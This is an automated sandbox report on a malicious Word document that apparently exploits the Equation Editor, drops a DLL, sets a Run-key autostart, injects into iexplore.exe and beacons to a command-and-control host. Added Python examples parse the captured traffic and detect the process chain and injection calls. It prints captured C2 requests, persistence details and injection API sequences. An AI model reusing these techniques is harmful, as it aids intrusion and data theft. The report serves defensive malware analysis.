
Analysis Report

Overview

General Information

Joe Sandbox Version: 21.0.0
Analysis ID: 487031
Start time: 19:13:34
Joe Sandbox Product: Cloud
Start date: 24.01.2018
Overall analysis duration: 0h 9m 10s
Hypervisor based Inspection enabled: false
Report type: full
Sample file name: DoNotOpen2.doc
Cookbook file name: defaultwindowsofficecookbook.jbs
Analysis system description: Windows 7 (Office 2010 SP2, Java 1.8.0_40, Flash 16.0.0.305, Acrobat Reader 11.0.08, Internet Explorer 11, Chrome 55, Firefox 43)
Number of new started processes analysed: 11
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies
  • HCA enabled
  • EGA enabled
  • GSI enabled (VBA)
  • GSI enabled (Javascript)
Detection: MAL
Classification: mal96.evad.expl.troj.winDOC@7/13@7/2
HCA Information:
  • Successful, ratio: 100%
  • Number of executed functions: 43
  • Number of non-executed functions: 73
EGA Information:
  • Successful, ratio: 100%
Cookbook Comments:
  • Found application associated with file extension: .doc
  • Found Word or Excel or PowerPoint document
  • Simulate clicks
  • Number of clicks 27
  • Close Viewer
Warnings:
  • Exclude process from analysis (whitelisted): OSPPSVC.EXE, WmiApSrv.exe, WMIADAP.exe, dllhost.exe
  • Report size exceeded maximum capacity and may have missing behavior information.
  • Report size getting too big, too many NtEnumerateKey calls found.
  • Report size getting too big, too many NtEnumerateValueKey calls found.
  • Report size getting too big, too many NtOpenKeyEx calls found.
  • Report size getting too big, too many NtQueryAttributesFile calls found.
  • Report size getting too big, too many NtQueryValueKey calls found.
  • Skipping Hybrid Code Analysis (implementation is based on Java, .Net, VB or Delphi, or parses a document) for: WINWORD.EXE


Detection

Strategy  | Score | Range   | Reporting      | Detection
Threshold | 96    | 0 - 100 | Report FP / FN | malicious


Confidence

Strategy  | Score | Range | Further Analysis Required? | Confidence
Threshold | 5     | 0 - 5 | false                      |


Classification

Analysis Advice

Sample drops PE files which have not been started, submit dropped PE samples for a secondary analysis to Joe Sandbox
Sample has a GUI, but Joe Sandbox has not found any clickable buttons, likely more UI automation may extend behavior
Sample monitors Window changes (e.g. starting applications), analyze the sample with the 'Simulates keyboard and window changes' cookbook



Signature Overview



Exploits:

Office Equation Editor has been started
  Source: unknown | Process created: C:\Program Files\Common Files\microsoft shared\EQUATION\EQNEDT32.EXE 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding
  Source: unknown | Process created: C:\Program Files\Common Files\microsoft shared\EQUATION\EQNEDT32.EXE 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding
Office Equation Editor starts processes (likely CVE-2017-11882 or CVE-2018-0802)
  Source: C:\Program Files\Common Files\microsoft shared\EQUATION\EQNEDT32.EXE | Process created: C:\Program Files\Internet Explorer\iexplore.exe

Key, Mouse, Clipboard, Microphone and Screen Capturing:

Creates a window with clipboard capturing capabilities
  Source: C:\Program Files\Common Files\microsoft shared\EQUATION\EQNEDT32.EXE | Window created: window name: CLIPBRDWNDCLASS

Software Vulnerabilities:

Potential document exploit detected (performs DNS queries)
  Source: global traffic | DNS query: name: api.ipaddress.com
Potential document exploit detected (performs HTTP gets)
  Source: global traffic | TCP traffic: 192.168.1.16:49188 -> 209.126.119.177:80
Potential document exploit detected (unknown TCP traffic)
  Source: global traffic | TCP traffic: 192.168.1.16:49188 -> 209.126.119.177:80
Document exploit detected (drops PE files)
  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | File created: a.b.1.dr

Networking:

Downloads files
  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word
Downloads files from webservers via HTTP
  Source: global traffic | HTTP traffic detected:
    GET /myip?format=txt HTTP/1.1
    Connection: Keep-Alive
    User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
    Host: api.ipaddress.com
Performs DNS lookups
  Source: unknown | DNS traffic detected: queries for: api.ipaddress.com
Posts data to webserver
  Source: unknown | HTTP traffic detected:
    POST /goix/nhbqad.asp HTTP/1.1
    Cache-Control: no-cache
    Connection: Keep-Alive
    Pragma: no-cache
    Accept: application/jason,application/xml, q=0.9,*/*, q=0.8
    Accept-Encoding: gzip, deflate
    Accept-Language: en-US
    Cookie: 339hndxz=0wEEgqeI/L2qQmlVILDcCEjSuUvCsdzViNvvozbedxbAdA==; o49jg=zWVEEy8HHngAYbc+1rE0gJkrvAStoctjYgNpv4k6Szt9NkBBW93Ico9ieReFMojFzEeoAHCYHUFDrRQsvDbgYVM2KqbYbWq/OaEJQ5mDN6c=; 5f51il=InuyYTmulipC/qjau0zml1Nu7+ym09aui/5ksuwxMGq7sY44kB6xGZGq/lwuTsKXbhsr7wKboki43IbVzk8H3Si3N/B0rCRkIuwEFKiK8ys=;
    Host: 3.sj2xp1.paj.org
    User-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko
    Content-Length: 3394
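The two requests above are the sample's only HTTP exchanges and they carry several beacon tells at once: a malformed Accept header (application/jason), a 3394-byte POST to a host that was never fetched with a GET, and two different User-Agent strings from the same process. The Python below is an added example, not part of the Joe Sandbox report: it rebuilds both requests with CRLF line breaks restored (cookie values and the GET's User-Agent are shortened, so the byte strings are constructed samples, not the exact wire bytes) and parses them into an IOC record plus a list of findings. The heuristics are this example's own, not Joe Sandbox signature logic.

```python
"""Parse the sample's two HTTP requests and extract beacon traits.

Added example, not part of the Joe Sandbox report. Both requests are rebuilt from the
report's 'Networking' entries with CRLF line breaks restored; cookie values and the GET's
User-Agent are truncated, so these are constructed samples rather than the exact wire bytes."""
import email

GET_REQ = (
    b"GET /myip?format=txt HTTP/1.1\r\n"
    b"Connection: Keep-Alive\r\n"
    b"User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0)\r\n"
    b"Host: api.ipaddress.com\r\n"
    b"\r\n"
)
POST_REQ = (
    b"POST /goix/nhbqad.asp HTTP/1.1\r\n"
    b"Cache-Control: no-cache\r\n"
    b"Connection: Keep-Alive\r\n"
    b"Pragma: no-cache\r\n"
    b"Accept: application/jason,application/xml, q=0.9,*/*, q=0.8\r\n"
    b"Accept-Encoding: gzip, deflate\r\n"
    b"Accept-Language: en-US\r\n"
    b"Cookie: 339hndxz=0wEEgqeI...; o49jg=zWVEEy8H...; 5f51il=InuyYTmu...;\r\n"
    b"Host: 3.sj2xp1.paj.org\r\n"
    b"User-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko\r\n"
    b"Content-Length: 3394\r\n"
    b"\r\n"
)

def parse_request(raw: bytes) -> dict:
    """Split a raw HTTP/1.x request head into an IOC-friendly record."""
    head, _, _body = raw.partition(b"\r\n\r\n")
    request_line, _, header_block = head.partition(b"\r\n")
    method, path, _version = request_line.decode("ascii").split(" ", 2)
    # The stdlib email parser handles "Name: value" header blocks, which HTTP shares.
    headers = email.message_from_bytes(header_block + b"\r\n")
    cookies = headers.get("Cookie", "")
    return {
        "method": method,
        "path": path,
        "host": headers.get("Host", ""),
        "user_agent": headers.get("User-Agent", ""),
        "accept": headers.get("Accept", ""),
        "cookie_names": [c.split("=", 1)[0].strip() for c in cookies.split(";") if c.strip()],
        "content_length": int(headers.get("Content-Length", "0")),
    }

def beacon_findings(requests) -> list[str]:
    """Traits that separate this traffic from a browser session (weak signals, to be combined)."""
    parsed = [parse_request(r) for r in requests]
    findings = []
    fetched_with_get = {p["host"] for p in parsed if p["method"] == "GET"}
    for p in parsed:
        # 'application/jason' is a typo no browser emits: a cheap, stable content match.
        if "application/jason" in p["accept"].lower():
            findings.append(f"malformed Accept header sent to {p['host']}")
        # Browsers GET a page before POSTing to it; a first-contact POST is a beacon trait.
        if p["method"] == "POST" and p["host"] not in fetched_with_get:
            findings.append(f"POST of {p['content_length']} bytes to {p['host']} without a prior GET")
        if p["host"].endswith("ipaddress.com") and p["path"].startswith("/myip"):
            findings.append("external IP lookup via api.ipaddress.com")
    # One process presenting as two different IE versions is not a browser.
    agents = {p["user_agent"] for p in parsed}
    if len(agents) > 1:
        findings.append(f"{len(agents)} distinct User-Agent strings from one sample")
    return findings
```

Each finding on its own is weak; the value is in pulling them out of captured traffic in a form a rule can combine. The Accept typo is a plain content match for an IDS signature, while the User-Agent mismatch and the first-contact POST need per-host flow state and belong in a proxy-log or NSM query rather than a packet rule.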
Urls found in memory or binary data
  Source: WINWORD.EXE | String found in binary or memory: file:///
  Source: WINWORD.EXE | String found in binary or memory: file:///C:
  Source: WINWORD.EXE | String found in binary or memory: file:///C:/Users/user/Desktop/DoNotOpen2.doc
  Source: WINWORD.EXE | String found in binary or memory: file:///C:/Users/user/Desktop/DoNotOpen2.docE
  Source: WINWORD.EXE | String found in binary or memory: file:///C:/Users/user/Desktop/DoNotOpen2.docO
  Source: explorer.exe | String found in binary or memory: file:///C:/Users/user/Documents
  Source: explorer.exe | String found in binary or memory: file:///C:/Users/user/Documentsrs
  Source: iexplore.exe | String found in binary or memory: http://
  Source: iexplore.exe | String found in binary or memory: http://%s
  Source: iexplore.exe | String found in binary or memory: http://%sConnectType
  Source: iexplore.exe | String found in binary or memory: http://103.236.150.14
  Source: iexplore.exe | String found in binary or memory: http://103.236.150.14192.168.1.16
  Source: iexplore.exe | String found in binary or memory: http://api.ipaddress.com/myip?format=txt
  Source: iexplore.exe | String found in binary or memory: http://api.ipaddress.com/myip?format=txt1
  Source: iexplore.exe | String found in binary or memory: http://https://:
  Source: iexplore.exe | String found in binary or memory: http://https://Try
  Source: WINWORD.EXE | String found in binary or memory: http://schemas.openx
  Source: WINWORD.EXE | String found in binary or memory: http://schemas.openxDV
  Source: WINWORD.EXE | String found in binary or memory: http://schemas.openxmlformat
  Source: WINWORD.EXE | String found in binary or memory: http://schemas.openxmlformatDV
  Source: explorer.exe | String found in binary or memory: http://wellformedweb.org/CommentAPI/
  Source: WINWORD.EXE | String found in binary or memory: http://www.
  Source: explorer.exe | String found in binary or memory: http://www.%s.comPA
  Source: WINWORD.EXE | String found in binary or memory: http://www.msnusers.com
  Source: iexplore.exe | String found in binary or memory: https://
  Source: iexplore.exe | String found in binary or memory: https://%s
  Source: iexplore.exe | String found in binary or memory: https://%sTry
  Source: explorer.exe | String found in binary or memory: https://en.wikipedia.org/wiki/XSLT/Muenchian_grouping
May check the online IP address of the machine
  Source: unknown | DNS query: name: api.ipaddress.com (7 identical entries)

Boot Survival:

Creates an autostart registry key
  Source: C:\Program Files\Internet Explorer\iexplore.exe | Registry value created or modified: HKEY_USERS\Software\Microsoft\Windows\CurrentVersion\Run IAStorD (4 identical entries)
Creates an autostart registry key pointing to binary in C:\Windows
  Source: C:\Program Files\Internet Explorer\iexplore.exe | Registry value created or modified: HKEY_USERS\Software\Microsoft\Windows\CurrentVersion\Run IAStorD
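A responder reading the rows above wants a repeatable way to decide which Run values deserve attention, using the same criteria the signature names (an autostart pointing into C:\Windows, a loader DLL under AppData). The Python below is an added example, not part of the Joe Sandbox report. The report shows only the value name IAStorD and that it targets C:\Windows, so RUN_ENTRIES is constructed: the IAStorD and NavShExt command lines are hypothetical stand-ins assembled from paths the report lists elsewhere, and the other two entries are benign controls.

```python
"""Triage Run-key autostart values by where they point.

Added example, not part of the Joe Sandbox report. The report shows only the value name
IAStorD and that it points into C:\\Windows; RUN_ENTRIES is therefore constructed, with the
IAStorD and NavShExt command lines as hypothetical stand-ins built from paths the report
lists, and two benign entries as controls."""
import re

RUN_ENTRIES = [  # (hive, value name, value data) -- constructed
    ("HKCU", "IAStorD", r"C:\Windows\IAStorD.exe"),  # hypothetical target path
    ("HKCU", "NavShExt",  # hypothetical; DLL path and export taken from the report's rundll32 line
     r'rundll32.exe "C:\Users\user\AppData\Roaming\Microsoft\Windows\Caches\NavShExt.dll",Setting'),
    ("HKLM", "SecurityHealth", r"C:\Windows\system32\SecurityHealthSystray.exe"),
    ("HKCU", "OneDrive", r'"C:\Users\user\AppData\Local\Microsoft\OneDrive\OneDrive.exe" /background'),
]

USER_WRITABLE = re.compile(r"\\(AppData|Temp|Users\\Public|ProgramData)\\", re.IGNORECASE)
# An executable directly in C:\Windows (not System32/SysWOW64) is unusual for a legitimate autostart.
WINDOWS_ROOT = re.compile(r"^[A-Z]:\\Windows\\[^\\]+\.(exe|dll)$", re.IGNORECASE)

def first_token(command: str) -> str:
    """The first path-like token of a command line, quoted or bare."""
    m = re.match(r'\s*"([^"]+)"|\s*(\S+)', command)
    return (m.group(1) or m.group(2)) if m else command

def triage_run_entry(hive: str, name: str, data: str) -> list[str]:
    """Reasons this autostart deserves a look; an empty list means nothing stood out."""
    flags = []
    target = first_token(data)
    if target.lower().endswith("rundll32.exe"):
        # rundll32 <dll>,<export>: the DLL, not rundll32 itself, is the thing to judge.
        rest = data[data.lower().index("rundll32.exe") + len("rundll32.exe"):]
        target = first_token(rest).split(",", 1)[0]
        flags.append("rundll32 export launch")
    if USER_WRITABLE.search(target):
        flags.append("binary in user-writable location")
    if WINDOWS_ROOT.match(target):
        flags.append("binary directly under C:\\Windows")
    if flags and hive == "HKCU":
        # Per-user Run keys need no elevation, which is exactly why document malware prefers them.
        flags.append("per-user key (set without elevation)")
    return flags

def audit_run_entries(entries) -> dict:
    """value name -> flags, listing only entries that tripped something."""
    result = {}
    for hive, name, data in entries:
        flags = triage_run_entry(hive, name, data)
        if flags:
            result[name] = flags
    return result
```

The path rules are deliberately cheap and produce the known false positive shown by the OneDrive control entry (legitimate per-user software also lives under AppData), so in practice they are paired with an Authenticode check on the target and with the file's creation time relative to the document open.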

Remote Access Functionality:

Contains functionality to launch and control a shell (cmd.exe)
  Source: C:\Program Files\Internet Explorer\iexplore.exe | Code function: \cmd.exe /c 3_2_00515486

Stealing of Sensitive Information:

Searches for user specific document files
  Source: C:\Windows\explorer.exe | Key value created or modified: C:\Users\user\Documents
  Source: C:\Windows\explorer.exe | Key value created or modified: C:\Users\user\Documents
  Source: C:\Windows\explorer.exe | Key value created or modified: C:\Users\Public\Documents
  Source: C:\Windows\explorer.exe | Key value created or modified: C:\Users\user\Documents
  Source: C:\Windows\explorer.exe | Key value created or modified: C:\Users\user\Documents\QLSSZNHVJI

Persistence and Installation Behavior:

Contains functionality to read ini properties file for application configuration
  Source: C:\Program Files\Internet Explorer\iexplore.exe | Code function: 3_2_005114F8 memset,memset,memset,SHGetSpecialFolderPathW,___swprintf_l,GetPrivateProfileStringW,memset,memset,_wfopen,fgetws,wcsstr,wcsstr,_wtoi,feof,fclose,___swprintf_l,3_2_005114F8
Drops PE files
  Source: C:\Program Files\Internet Explorer\iexplore.exe | File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Caches\NavShExt.dll
  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | File created: C:\Users\user~1\AppData\Local\Temp\a.b
Drops files with a non-matching file extension (content does not match file extension)
  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | File created: C:\Users\user~1\AppData\Local\Temp\a.b

Data Obfuscation:

Contains functionality to dynamically determine API calls
  Source: C:\Program Files\Internet Explorer\iexplore.exe | Code function: 3_2_00517143 GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,memset,GetUserNameA,MultiByteToWideChar,WideCharToMultiByte,ConvertSidToStringSidA,3_2_00517143
Uses code obfuscation techniques (call, push, ret)
  Source: C:\Program Files\Common Files\microsoft shared\EQUATION\EQNEDT32.EXE | Code function: 2_2_617B34A3 push ecx; ret 2_2_617B34B6
  Source: C:\Program Files\Common Files\microsoft shared\EQUATION\EQNEDT32.EXE | Code function: 2_2_617B3329 push ecx; ret 2_2_617B333C

System Summary:

Reads the Windows registered owner settings
  Source: C:\Program Files\Internet Explorer\iexplore.exe | Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion RegisteredOwner
Uses Rich Edit Controls
  Source: C:\Windows\explorer.exe | File opened: C:\Windows\system32\MsftEdit.dll
Found graphical window changes (likely an installer)
  Source: Window Recorder | Window detected: More than 3 window changes detected
Checks if Microsoft Office is installed
  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | Key opened: HKEY_USERS\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItems
Uses new MSVCR Dlls
  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | File opened: C:\Windows\WinSxS\x86_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_50916076bcb9a742\MSVCR90.dll
Binary contains paths to development resources
  Source: iexplore.exe | Binary or memory string: 3.vbP.v
Classification label
  Source: classification engine | Classification label: mal96.evad.expl.troj.winDOC@7/13@7/2
Contains functionality to check free disk space
  Source: C:\Program Files\Internet Explorer\iexplore.exe | Code function: 3_2_00516D52 GetModuleHandleW,GetProcAddress,GetTempPathW,GetDiskFreeSpaceExW,3_2_00516D52
Contains functionality to enum processes or threads
  Source: C:\Program Files\Internet Explorer\iexplore.exe | Code function: 3_2_004F2A05 CreateToolhelp32Snapshot,memset,memset,Process32FirstW,___swprintf_l,Process32NextW,CloseHandle,3_2_004F2A05
Creates files inside the user directory
  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | File created: C:\Users\user\Desktop\~$NotOpen2.doc
Creates temporary files
  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | File created: C:\Users\user~1\AppData\Local\Temp\CVR12AE.tmp
Launches a second explorer.exe instance
  Source: unknown | Process created: C:\Windows\explorer.exe
  Source: unknown | Process created: C:\Windows\explorer.exe
Reads ini files
  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | File read: C:\Users\desktop.ini
Reads software policies
  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Reads the Windows registered organization settings
  Source: C:\Program Files\Internet Explorer\iexplore.exe | Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion RegisteredOrganization
Spawns processes
  Source: unknown | Process created: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE 'C:\Program Files\Microsoft Office\Office14\WINWORD.EXE' /n 'C:\Users\user\Desktop\DoNotOpen2.doc
  Source: unknown | Process created: C:\Program Files\Common Files\microsoft shared\EQUATION\EQNEDT32.EXE 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding
  Source: unknown | Process created: C:\Program Files\Internet Explorer\iexplore.exe C:\Program Files\Internet Explorer\iexplore.exe
  Source: unknown | Process created: C:\Windows\explorer.exe explorer.exe C:\Windows\system32\rundll32.exe C:\Users\user\AppData\Roaming\Microsoft\Windows\Caches\NavShExt.dll,Setting
  Source: unknown | Process created: C:\Program Files\Common Files\microsoft shared\EQUATION\EQNEDT32.EXE 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding
  Source: unknown | Process created: C:\Windows\explorer.exe C:\Windows\explorer.exe /factory,{75dff2b7-6936-4c06-a8bb-676a7b00b24b} -Embedding
  Source: C:\Program Files\Common Files\microsoft shared\EQUATION\EQNEDT32.EXE | Process created: C:\Program Files\Internet Explorer\iexplore.exe C:\Program Files\Internet Explorer\iexplore.exe
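The process list above, together with the Exploits section earlier in this report, is the whole kill chain in four steps: WINWORD.EXE opens the document, EQNEDT32.EXE is started as a COM server, the exploited Equation Editor spawns iexplore.exe, and iexplore.exe uses explorer.exe to run rundll32.exe against a DLL dropped under AppData. The Python below is an added example, not part of the Joe Sandbox report, showing how those steps look as rules over Sysmon-style process-creation events. EVENTS is constructed from the command lines the report lists; because the report records most parents as "unknown", every ParentImage marked "assumed" is this example's assumption (in particular, EQNEDT32.EXE is taken to be launched out-of-process by svchost.exe, not by WINWORD.EXE, which is why a rule keyed only on WINWORD as parent would miss it).

```python
"""Detect the process chain in this report from Sysmon-style process-creation events.

Added example, not part of the Joe Sandbox report. EVENTS is constructed from the command
lines the report lists under 'Exploits' and 'Spawns processes'. The report records most
parents as 'unknown', so every ParentImage marked 'assumed' is this example's assumption;
in particular EQNEDT32.EXE is started as an out-of-process COM server, so its parent is
taken to be svchost.exe rather than WINWORD.EXE."""
import re
from dataclasses import dataclass

@dataclass
class ProcEvent:
    image: str          # full path of the created process
    parent_image: str   # full path of the creating process
    command_line: str

OFFICE_PARENTS = {"winword.exe", "excel.exe", "powerpnt.exe", "eqnedt32.exe"}
# Children Office creates in normal use; anything else from an Office parent is worth an alert.
OFFICE_EXPECTED_CHILDREN = {"splwow64.exe", "dw20.exe", "dwwin.exe"}
USER_WRITABLE = re.compile(r"\\(AppData|Temp|Users\\Public|ProgramData)\\", re.IGNORECASE)
# rundll32 <dll>,<export>: capture the DLL path (quoted or bare) and the export name.
RUNDLL_ARG = re.compile(r'rundll32\.exe\s+"?([^",]+\.dll)"?,\s*(\w+)', re.IGNORECASE)

def basename(path: str) -> str:
    return path.rsplit("\\", 1)[-1].lower()

def evaluate(ev: ProcEvent) -> list[str]:
    """Names of the rules an event trips; an empty list means nothing of interest."""
    hits = []
    child, parent = basename(ev.image), basename(ev.parent_image)
    if parent == "eqnedt32.exe":
        # Equation Editor has no legitimate reason to create processes (CVE-2017-11882 / CVE-2018-0802 pattern).
        hits.append("equation_editor_spawn")
    elif parent in OFFICE_PARENTS and child not in OFFICE_EXPECTED_CHILDREN:
        hits.append("office_spawns_unexpected_child")
    if child == "eqnedt32.exe" and "-embedding" in ev.command_line.lower():
        # The COM start itself is rare enough to alert on where Equation Editor is not in use.
        hits.append("equation_editor_com_start")
    m = RUNDLL_ARG.search(ev.command_line)
    if m and USER_WRITABLE.search(m.group(1)):
        # Covers both direct rundll32 launches and the explorer.exe indirection seen here.
        hits.append(f"rundll32_user_dll:{basename(m.group(1))}!{m.group(2)}")
    return hits

def scan(events):
    """[(image basename, hits)] for every event that tripped at least one rule."""
    return [(basename(e.image), h) for e in events if (h := evaluate(e))]

EVENTS = [  # constructed from the report's process list
    ProcEvent(r"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE",
              r"C:\Windows\explorer.exe",  # assumed
              r'"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\user\Desktop\DoNotOpen2.doc"'),
    ProcEvent(r"C:\Program Files\Common Files\microsoft shared\EQUATION\EQNEDT32.EXE",
              r"C:\Windows\System32\svchost.exe",  # assumed (DCOM launch)
              r'"C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding'),
    ProcEvent(r"C:\Program Files\Internet Explorer\iexplore.exe",
              r"C:\Program Files\Common Files\microsoft shared\EQUATION\EQNEDT32.EXE",
              r"C:\Program Files\Internet Explorer\iexplore.exe"),
    ProcEvent(r"C:\Windows\explorer.exe",
              r"C:\Program Files\Internet Explorer\iexplore.exe",  # assumed
              r"explorer.exe C:\Windows\system32\rundll32.exe C:\Users\user\AppData\Roaming\Microsoft\Windows\Caches\NavShExt.dll,Setting"),
    ProcEvent(r"C:\Windows\System32\svchost.exe",  # benign control event
              r"C:\Windows\System32\services.exe",
              r"C:\Windows\System32\svchost.exe -k netsvcs"),
]
```

Running scan(EVENTS) trips three of the four constructed events and leaves WINWORD.EXE and the svchost.exe control untouched. The rundll32 rule inspects the command line rather than the image so that it fires on the explorer.exe hop in this chain as well as on a direct rundll32.exe launch.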
Uses an in-process (OLE) Automation server
  Source: C:\Windows\explorer.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{35786D3C-B075-49b9-88DD-029876E11C01}\InProcServer32
PE file has section (not .text) which is very likely to contain packed code (zlib compression ratio < 0.011)
  Source: NavShExt.dll.3.dr | Static PE information: Section: .data ZLIB complexity 0.998944256757
Detected potential crypto function
  Source: C:\Program Files\Common Files\microsoft shared\EQUATION\EQNEDT32.EXE | Code function: 2_2_617B223D
  Source: C:\Program Files\Internet Explorer\iexplore.exe | Code function: 3_2_004F13F5
  Source: C:\Program Files\Internet Explorer\iexplore.exe | Code function: 3_2_00513ABC
  Source: C:\Program Files\Internet Explorer\iexplore.exe | Code function: 3_2_00519361
  Source: C:\Program Files\Internet Explorer\iexplore.exe | Code function: 3_2_00519958
  Source: C:\Program Files\Internet Explorer\iexplore.exe | Code function: 3_2_005186ED
  Source: C:\Program Files\Internet Explorer\iexplore.exe | Code function: 3_2_00519591
  Source: C:\Program Files\Internet Explorer\iexplore.exe | Code function: 3_2_00518EF8
Found potential string decryption / allocating functions
  Source: C:\Program Files\Internet Explorer\iexplore.exe | Code function: String function: 00517FBE appears 69 times
Office process drops PE file
  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | File created: C:\Users\user~1\AppData\Local\Temp\a.b

HIPS / PFW / Operating System Protection Evasion:

May try to detect the Windows Explorer process (often used for injection)
  Source: iexplore.exe, explorer.exe | Binary or memory string: Progman
  Source: iexplore.exe, explorer.exe | Binary or memory string: Program Manager
  Source: iexplore.exe, explorer.exe | Binary or memory string: Shell_TrayWnd
Creates a process in suspended mode (likely to inject code)
  Source: C:\Program Files\Common Files\microsoft shared\EQUATION\EQNEDT32.EXE | Process created: C:\Program Files\Internet Explorer\iexplore.exe C:\Program Files\Internet Explorer\iexplore.exe
Contains functionality to inject code into remote processes
  Source: C:\Program Files\Common Files\microsoft shared\EQUATION\EQNEDT32.EXE | Code function: 2_2_617B223D Setting,IsDebuggerPresent,CreateMutexA,GetLastError,CloseHandle,CloseHandle,memset,SHGetSpecialFolderPathA,memset,MultiByteToWideChar,GetModuleHandleW,GetProcAddress,GetProcAddress,CreateProcessA,memset,GetModuleFileNameA,GetProcAddress,GetProcAddress,VirtualAllocEx,WriteProcessMemory,GetProcAddress,CreateRemoteThread,WaitForSingleObject,WaitForSingleObject,GetExitCodeThread,CreateRemoteThread,WaitForSingleObject,VirtualFreeEx,CloseHandle,2_2_617B223D
Contains functionality to inject threads in other processes
  Source: C:\Program Files\Common Files\microsoft shared\EQUATION\EQNEDT32.EXE | Code function: 2_2_617B223D Setting,IsDebuggerPresent,CreateMutexA,GetLastError,CloseHandle,CloseHandle,memset,SHGetSpecialFolderPathA,memset,MultiByteToWideChar,GetModuleHandleW,GetProcAddress,GetProcAddress,CreateProcessA,memset,GetModuleFileNameA,GetProcAddress,GetProcAddress,VirtualAllocEx,WriteProcessMemory,GetProcAddress,CreateRemoteThread,WaitForSingleObject,WaitForSingleObject,GetExitCodeThread,CreateRemoteThread,WaitForSingleObject,VirtualFreeEx,CloseHandle,2_2_617B223D
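The two injection signatures above, and the "dynamically determine API calls" entry under Data Obfuscation, all derive from one recorded call list for function 2_2_617B223D: the exported Setting routine resolves its imports at runtime, creates a victim process, then does VirtualAllocEx, WriteProcessMemory and CreateRemoteThread into it. The Python below is an added example, not part of the Joe Sandbox report, of how such per-function call lists are matched against ordered API patterns with arbitrary gaps, which is the general form of these signatures. INJECTOR_CALLS is copied from the report's entry; PATTERNS and the summary logic are this example's own and are not Joe Sandbox's signature definitions.

```python
"""Match ordered API-call patterns against the per-function call lists a sandbox records.

Added example, not part of the Joe Sandbox report. INJECTOR_CALLS is the call list the
report gives for function 2_2_617B223D in EQNEDT32.EXE; PATTERNS is this example's own
set of sequences, not Joe Sandbox's signature definitions."""

INJECTOR_CALLS = (
    "Setting,IsDebuggerPresent,CreateMutexA,GetLastError,CloseHandle,CloseHandle,memset,"
    "SHGetSpecialFolderPathA,memset,MultiByteToWideChar,GetModuleHandleW,GetProcAddress,"
    "GetProcAddress,CreateProcessA,memset,GetModuleFileNameA,GetProcAddress,GetProcAddress,"
    "VirtualAllocEx,WriteProcessMemory,GetProcAddress,CreateRemoteThread,WaitForSingleObject,"
    "WaitForSingleObject,GetExitCodeThread,CreateRemoteThread,WaitForSingleObject,"
    "VirtualFreeEx,CloseHandle"
).split(",")

# Ordered API names; any number of other calls may sit between consecutive entries.
PATTERNS = {
    "remote_thread_injection": ["VirtualAllocEx", "WriteProcessMemory", "CreateRemoteThread"],
    "dynamic_api_resolution": ["GetModuleHandleW", "GetProcAddress", "GetProcAddress"],
    "debugger_check_then_mutex": ["IsDebuggerPresent", "CreateMutexA"],
    # Not present in this sample; included to show a pattern that must not match.
    "process_hollowing": ["CreateProcessA", "NtUnmapViewOfSection", "WriteProcessMemory",
                          "SetThreadContext", "ResumeThread"],
}

def canonical(api: str) -> str:
    """Fold ANSI/Unicode variants (CreateProcessA/W) onto one name so patterns match either."""
    return api[:-1] if len(api) > 2 and api[-1] in "AW" else api

def ordered_match(calls, pattern):
    """Indices in `calls` where `pattern` occurs as an in-order subsequence, else None."""
    want = [canonical(p) for p in pattern]
    found, pos = [], 0
    for i, call in enumerate(calls):
        if canonical(call) == want[pos]:
            found.append(i)
            pos += 1
            if pos == len(want):
                return found
    return None

def match_patterns(calls, patterns=PATTERNS):
    """pattern name -> index list for every pattern found in `calls`."""
    return {name: idx for name, seq in patterns.items()
            if (idx := ordered_match(calls, seq)) is not None}

def injection_summary(calls):
    """Describe the injection in responder terms, or None if the pattern is absent."""
    idx = ordered_match(calls, PATTERNS["remote_thread_injection"])
    if idx is None:
        return None
    return {
        # A CreateProcess before the first VirtualAllocEx means the victim is spawned, not found.
        "creates_own_target": any(canonical(c) == "CreateProcess" for c in calls[:idx[0]]),
        "remote_threads": sum(1 for c in calls[idx[0]:] if c == "CreateRemoteThread"),
        "cleans_up": "VirtualFreeEx" in calls[idx[-1]:],
    }
```

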